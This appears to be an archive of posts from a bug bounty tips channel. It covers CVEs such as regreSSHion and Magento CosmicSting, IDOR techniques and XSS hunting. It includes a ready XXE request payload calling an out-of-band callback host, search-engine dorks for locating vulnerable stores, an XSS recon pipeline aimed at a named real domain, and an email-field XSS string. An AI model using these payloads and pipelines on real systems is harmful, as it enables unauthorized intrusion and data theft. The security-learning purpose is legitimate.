Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Posts Archive
😎Your Kali Linux sucks👇
Yes, your Kali Linux sucks, as you guys don't have an updated one, or have it installed as bootable, which will be slow, or on a 16 GB USB where it takes 3 hrs to load.
If yes, then check out my video on
📹 Install kali linux in three steps.
1️⃣ Download @vmware workstation player
2️⃣ Download @kalilinux pre-build virtual machines
3️⃣ Open vmware and add the configuration file.
Type the 👇
Default Username : KALI
Default Password : KALI
🎉 You’re all set to explore the powerful tools and features of Kali Linux!👉
Save this post for later and share it with your friends. 💬 Got questions? Drop them in the comments! 🔗 Check out the link in our bio for a telegram channel.
#kali #bugbounty #learnings #hack #hacks #hacking #hackingtools #vmware #linux #cybersecurity #cyber #cyberpunk #kalilinux #linux #tools #ai
https://www.instagram.com/reel/C88ygelS-TF/?igsh=MTc4MmM1YmI2Ng==
🔍List of GitHub Dorks for bug bounties.
📋Finding target files, languages, API keys, tokens, usernames, passwords, and information using dates and extensions 📓
🔖#infosec #cybersecurity #hacking #pentesting #security
🔐 Tip of the Day: How HTTPS Works! 🌐🔍
Ever wondered how your data stays safe while browsing the web? Dive into the world of HTTPS and discover the magic behind secure communication. 🔒✨
1️⃣ Server Certificate Check: Ensuring the server is who it claims to be.
2️⃣ Key Exchange: Establishing a secure connection with encryption keys.
3️⃣ Encrypted Tunnel: Safeguarding your data as it travels between client and server.
Stay informed, stay secure! 💻🔐
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
Credit : @bytebytego
https://www.instagram.com/p/C86mxZNyqq8/?igsh=MTc4MmM1YmI2Ng==
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. The CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠️CosmicSting enables attackers to gain unauthorized access
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
📣Dorks:
Hunter: product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
▶️Video POC: https://youtu.be/rDs_Qj7K31M
🔴POC: https://github.com/th3gokul/CVE-2024-34102
⛔️Payload:
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData": {"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
⚠️Tool Made By: D. Sanjai Kumar & Gokul V
⚡️Burp Suite for Pentester
ℹ️This cheat sheet is built for Bug Bounty Hunters and penetration testers to help them hunt the vulnerabilities. It is designed such that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options.
🔹 Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
🔗Link: https://github.com/Ignitetechnologies/BurpSuite-For-Pentester
🔖#infosec #cybersecurity #hacking #pentesting #security
Guys, happy to announce that I was working on an automated recon-to-XSS tool; today I completed it and was able to successfully execute it. So I request you guys to check it and let me know your thoughts, and please do share the tool and support me. I'm also happy for more contributions to the tool.
https://github.com/Adwaithsheety/Auto_xss
100 web vulnerabilities, interactive mind maps. Hope you guys like this. If yes, give a lot of reactions, please.
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
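Added example, not from the original post or from Intigriti: a server-side object-level authorization check of the kind the nine techniques above probe for. All names (RECORDS, Denied, single_param, scalar_id, authorize, is_denied) are hypothetical, the data is constructed, and this sample assumes numeric ids.

```python
# Added example. RECORDS, Denied, single_param, scalar_id, authorize and
# is_denied are hypothetical names; the data below is constructed.
from urllib.parse import parse_qsl

RECORDS = {
    "1001": {"owner": "1001", "email": "alice@example.test"},
    "1002": {"owner": "1002", "email": "bob@example.test"},
}

class Denied(Exception):
    """Raised for every refusal, so callers return one uniform error."""

def single_param(query: str, name: str) -> str:
    # Technique 2: a duplicated parameter is refused outright, so no two
    # layers can disagree about which copy is authoritative.
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if len(values) != 1:
        raise Denied(f"expected exactly one {name}")
    return values[0]

def scalar_id(value) -> str:
    # Technique 3: arrays, booleans, wildcards and huge integers from a
    # JSON body are refused; only a short ASCII decimal id is accepted.
    if isinstance(value, bool) or not isinstance(value, (str, int)):
        raise Denied("id must be a scalar")
    text = str(value)
    if not (text.isascii() and text.isdigit() and len(text) <= 18):
        raise Denied("id must be a short decimal number")
    return text

def authorize(session_uid: str, raw_id) -> dict:
    # Techniques 1 and 4-9: one ownership check keyed on the session,
    # called by every route regardless of method, content type or API
    # version, and again whenever a stored id is read back later.
    if isinstance(raw_id, str) and raw_id in ("me", "current"):
        object_id = session_uid      # technique 7: keyword resolves from the session
    else:
        object_id = scalar_id(raw_id)
    record = RECORDS.get(object_id)
    if record is None or record["owner"] != session_uid:
        raise Denied("not found")    # same answer for missing and foreign ids
    return record

def is_denied(fn, *args) -> bool:
    """True when fn(*args) is refused with Denied."""
    try:
        fn(*args)
    except Denied:
        return True
    return False
```

Because the decision depends only on the session and the record's owner, an unpredictable id (technique 8) adds obscurity but is never what grants access.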
Find XSS by automating the following workflow:
1. subfinder -d indeed.com -o indeed.txt //Find Subdomains
2. httpx -l indeed.txt -o httpx.txt // Live Subdomains
3. echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4. cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5. cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6. cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script : https://github.com/dirtycoder0124/xss
Tips 🌿🌻🍂
Whenever you see any email input field!
70% of bug hunters don't try XSS there, as compared to the name field.
Always try this in the email input field!
"<img/src/onerror=alert(0)"@xss.com
This doesn't work every time, but give it a try. Found 2 XSS today using this!
IDOR TIPS~
Always try to find hidden parameters for these endpoints using Arjun, Parameth, etc.
Endpoints:-
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
And any similar endpoints.
#bugbounty #BugBountyTip #CyberSecurity #hackers #infosec